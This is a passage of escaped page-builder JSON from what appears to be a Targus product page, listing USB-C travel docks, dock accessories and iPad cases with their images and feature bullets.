\\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9b8f07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4e11288\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\\\" width=\\\"181\\\" height=\\\"181\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce38b83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b5d41f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\\\" alt=\\\"Picture of USB-C Alt-Mode Travel Dock w\\/ PD (Black)\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e209b35\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c7ea6f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b59de72\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.<\\/li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.<\\/li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability<\\/li><li>Mac or PC compatible<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cf4acb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed7cdb2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Host-powered 90 mm tethered USB Type-C DisplayPort\\u2122 Alt-Mode (compatible with Thunderbolt\\u2122 3) host connection<\\/li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection<\\/li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port<\\/li><li>1 Gigabit Ethernet port<\\/li><li>HDMI includes 6 (5.1) channel audio<\\/li><li>Universal compatibility with popular Windows\\u00ae and macOS\\u2122 platforms<\\/li><li>Compact size that\\u2019s ideal for travel<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af63771\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a6089bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>mDP (4096 x 2160 p30 max)<\\/li><li>HDMI (4096 x 2160 p30 max)<\\/li><li>VGA (1920 x 1200)<\\/li><li>USB-C upstream cable (Laptop charging capable by PD pass through)<\\/li><li>2 x USB 3.1 Gen 1 type A downstream port<\\/li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support<\\/li><li>Gigabit Ethernet; Lock Slot<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3110\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e6c4a3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1f4a7f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"edce3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c36b73\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f56d76e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e61842f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99db6fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"aa18c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"adb6db3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"490dda7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b4a251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"173a4c8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dock Accessories\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17016d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9c15a98\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4ed087c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C to USB-A Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1104GLX)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0932912\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8825bbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3-Pin 3-Way Hydra DC Power Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1009USX)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce75109\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5870ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Multiplexer Adapter<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA46USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4969a2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b576756\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA42USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19c81a5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"ccebe66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b656cbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0053546_usb-cf-to-usb-30-am-cable.jpeg\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1efc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f549af5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0030033_3-pin-3-way-hydra-dc-power-cable.png\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c69d965\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"42471ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA47GLZ_MAIN1_grande.png?v=1564601685\\\" alt=\\\"USB-C Multiplexer Adapter\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa37978\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"15b0138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA42USZ_grande.jpg?v=1553683594\\\" alt=\\\"USB-C\\u2122 Demultiplexer\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5635ad5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"bac619d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1f7ee4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>USB Type-C female to USB 3.0 Type-A cable<\\/li><li>10cm long with tether<\\/li><li>Transfers data at rates up to 5 Gbps<\\/li><li>Compatible with Targus DOCK180USZ<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd75d2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bcabecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Powers up to 1 large and 1 small device simultaneously<\\/li><li>Supports three connectors for multi-user and multi-device environments<\\/li><li>Self-locking collars ensure tips and power cable stay in place<\\/li><li>Uses existing Targus power cable and power tips from your powered dock (not included)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30e0068\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4be429\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports USB-C laptops<\\/li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ<\\/li><li>Compact size for easy carrying<\\/li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port<\\/li><li>5 different charge profiles to ensure compatibility<\\/li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c23edb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ea8be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 USB-C\\/F port<\\/li><li>Enables support for legacy host devices<\\/li><li>Uses universal 3-pin power tip support<\\/li><li>For use with DOCK 180<\\/li><li>Supports power delivery charging up to 60W<\\/li><li>Supports USB 3.0 data transfer up 5 Gbps<\\/li><li>1 USB 3.0 Type A\\/M cable<\\/li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72a48df\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"adce2ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d0ec8ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ae9eaf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f4d772a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4e92ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e24acf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c539844\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ce0714\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75cb4ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7bb65b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4d7d888\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5aab643\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9405cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7d72c96\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablet Cases\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ed426c2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"092906a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2d78b2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Multi-Gen for 9.7\\\" IPad Pro, iPad Air 1, And 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ634GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93dca52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ab79003\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3D Protection<\\/strong><strong>\\u2122 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">Multi-Gen for <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">9.7 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">iPad Pro, iPad Air 1, and 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ635GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f08dfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"516eeda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Pro-Tek Rotating iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73711GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98a279c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3fdbec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"36a5239\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ634GL_FRONT_grande.png?v=1549412474\\\" alt=\\\"Black VersaVu\\u00ae Classic Case (Black) for iPad\\u00ae (2017\\/2018) (THZ634GL) - Front\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"958ad63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c2df414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed59759\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"910248c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ73711GL_MAIN1_grande.png?v=1569597181\\\" alt=\\\"Pro-Tek Rotating Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\\\" width=\\\"198\\\" height=\\\"198\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fba5ec6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e24f29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1914c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape views<\\/li><li>Adjustable viewing angles and comfortable typing angle<\\/li><li>Precision cut access to controls, ports, and camera<\\/li><li>Tray design enhances audio performance<\\/li><li>Integrated stylus holder protects your Apple Pencil\\u2122 or stylus<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Convenient sleep\\/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b20e73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a748414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Infinite viewing angles plus comfortable typing position<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Flexible tray with reinforced corners and bezel protection<\\/li><li>Precision-cut access to controls, ports, and camera lenses<\\/li><li>Easy-grip textured cover with secure magnetic wrap closure<\\/li><li>Tray design enhances audio performance<\\/li><li>Convenient sleep\\/wake function works with iPad Pro\\u00a0 (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ffba5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ba8511\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Color Black \\/ Charcoal &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design enhances protection<\\/li><li>Reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision-cut access to controls, ports, and camera<\\/li><li>Audio-enhancing sound scoops boost sound performance<\\/li><li>Secure magnetic wrap closure<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876b52c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"060847f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"29c5815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9410617\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ef66c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b29bf2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da0f29b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0a24c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a7e46e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"356bcf5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7e3c56\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8b4c09e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"178c12b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Click-In iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73608GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c0be7cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da27b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu <\\/strong><strong>iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc07dd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"76e312e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu Signature iPad 9.7\\\" <\\/strong><strong>2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73902GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a601f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6e3305b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cff07c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73608GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"Click-In Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d78178e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c49cf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73803GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6eaf744\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"043a47e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73902GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Signature Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b4b865\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"246c1eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4857c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black\\/Charcoal, Rose Gold &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports, and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e18e471\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04d07d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal, Blue &amp; Red<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d27da\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9b51775\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an 